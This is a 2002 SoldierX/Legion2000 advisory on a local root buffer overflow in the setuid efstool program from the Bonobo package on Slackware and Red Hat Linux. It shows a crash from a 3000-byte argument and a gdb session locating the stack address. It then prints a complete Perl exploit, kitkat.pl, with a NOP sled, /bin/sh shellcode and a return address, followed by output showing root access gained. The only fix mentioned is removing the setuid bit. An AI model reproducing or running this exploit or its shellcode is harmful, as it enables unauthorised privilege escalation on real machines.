efstool.txt

` §+++++++++++++++++++++++++++++++++++++++++++++++§  
]|[ [-=- SOLDIERX.COM Presents -=-] ]|[  
+++++++++++++++§+++_________________________________________+++§+++++++++++++++  
\\//////////////// EFSTOOL LOCAL ROOT EXPLOIT \\\\\\\\\\\\\\\\//  
\\\\\\\\\\\\\\\\\______________SLACKWARELINUX_____________/////////////////  
\\:::::::::::::::::::::::::::::::: by ::::::::::::::::::::::::::::::::://  
\\xxxxxxxxxxxxxxxxxxxxxxxx§-=-][-NTFX-][-=-§xxxxxxxxxxxxxxxxxxxxxxxxx//  
\\:::::::::::::::::::::::::::::: of ::::::::::::::::::::::::::::::://  
\\ SOLDIERX.COM, LEGION2000 //  
\\ September, 2002 //  
\\ NOBODY CAN STOP INFORMATION INSEMINATION //  
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§  
[ Author's E-mail - [email protected] ]  
**********************************************************************  
| The author hereby grants permission to reproduce, redistribute, |  
| or include this file(s) in your file section, electronic or print |  
| newletter, or any other form of transmission that you choose, as |  
| long as it is kept intact and whole, with no ommissions, delet- |  
| ions, or changes. (C)2002 SOLDIERX.COM - http://www.soldierx.com |  
**********************************************************************  
  
[L2K Advisory ef0001]  
Feb 13th 02  
EFSTOOL LOCAL ROOT  
Author: ntfx <[email protected]>  
Legion2000 Security Research (c)  
Soldierx Dot Com (c)  
Web: http://legion200.security.nu  
Web: http://soldierx.com  
Note: i have previously not written any  
advisories so be patient.  
  
What is Bonobo (contains the efstool package)  
  
Bonobo is a set of language and system independant CORBA interfaces  
for creating reusable components, controls and creating compound documents.  
  
The Bonobo distribution includes a Gtk+ based implementation of the  
Bonobo interfaces, enabling developers to create reusable  
components and applications that can be used to form more complex documents.  
  
There has been found a condition in efstool which is  
shipped with redhat linux / slackware linux and possibly  
others which given the right environment root  
privilages can be gained. Dependant on suid permissions.  
  
If a user prints 3000 "A" to the buffer this will  
seg fault the program as shown below.  
  
$ /usr/bin/efstool `perl -e 'print "A" x 3000'`  
Segmentation fault  
  
Now we proceed to open gdb on the item to view  
what may have occured.  
  
$gdb /usr/bin/efstool  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for  
details.  
This GDB was configured as "i386-slackware-linux"...  
(no debugging symbols found)...  
(gdb) r `perl -e 'print "A" x 3000'`  
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`  
(no debugging symbols found)...(no debugging symbols found)...  
(no debugging symbols found)...  
(no debugging symbols found)...(no debugging symbols found)...  
Program received signal SIGSEGV, Segmentation fault.  
0x41414141 in ?? ()  
(gdb) info reg esp  
esp 0xbfffe890 0xbfffe890  
(gdb)  
  
Here as you can see we are able to gain the return address.  
Return : 0xbfffe890  
when we get to the return address it will return to the nops and  
continue down the code which will this execute a shell in our exploit.  
  
The offset has to be played with for the exploit to work  
effeciently but a offset of around -1000 / -2000 should  
work.  
  
I have done minimal testing on this, So if it doesnt work fully  
do not come crying to me. It has been tested on slackware 7.1  
  
Solution to this : remove suid permissions on the program  
#chmod u-s efstool  
  
added: Do not confuse this with the other efstool release, Our version was semi released  
back in Feb 13th when the original discovery took place, I personally  
do not like using security focus for releases or have ever previously  
bothered with it. - ntfx 10.09  
  
Included is the example exploit.  
--------------------------cut kitkat.pl---------------------------------  
#!/usr/bin/perl  
# Efstool local root exploits (Slackware 8.1)  
# Author: ntfx <[email protected]> Feb 13th 2002  
# Legion2000 Security Research (c)  
# Soldierx Dot Com  
# WEB: HTTP://legion2000.security.nu  
# WEB: HTTP://soldierx.com  
# GREET: Legion2000SR, Soldierx.com, Kat  
############################################  
# Solution: chmod u-s efstool  
############################################  
if(! $ARGV[0])  
{  
&usage;  
exit;  
}  
  
sub usage() {  
print "USAGE: perl $0 <offset> kat\n";  
print "efstool local root by ntfx\n";  
print "Legion2000SR http://legion2000.security.nu\n";  
print "Soldierx http://soldierx.com\n";  
exit(0);   
}  
  
$ret = "0xbfffe890";  
$offset = $ARGV[0];  
$nop = "\x90";  
$ev1lc0de = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".  
"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".  
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".  
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".  
"/bin/sh";  
  
if ($ARGV[1] eq "kat") {  
$len = 3000;  
for ($i = 0; $i < ($len - length($ev1lc0de)); $i++) {  
$buffer .= $nop;  
}  
$buffer .= $ev1lc0de;  
}   
$buffer .= pack('l', ($ret + $offset));  
$buffer .= pack('l', ($ret + $offset));  
  
# You will now be privilaged..  
exec("/usr/bin/efstool $buffer");  
sleep 2;  
system("id; uname -a");  
# This has been a SoldierX/Legion2000 Production.  
--------------------------cut kitkat.pl---------------------------------  
  
$ perl kitkat.pl kat  
uid=0(root) gid=100(users) groups=100(users)  
Linux efstool-exp 2.2.21 #1 Thu Jun 13 03:57:27 BST 2002 i586 unknown  
#  
  
As you can see root privilages have been gained and with the system exec it displays  
the proven root uid and uname of the system.  
  
ntfx <[email protected]>  
_____________________________________________________________________  
§=------------------------------]-§-[------------------------------=§  
\\ THIS FILE WAS A SOLDIERX PRODUCTION //  
\\ http://www.soldierx.com //  
\\ NOBODY CAN STOP INFORMATION INSEMINATION //  
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§  
`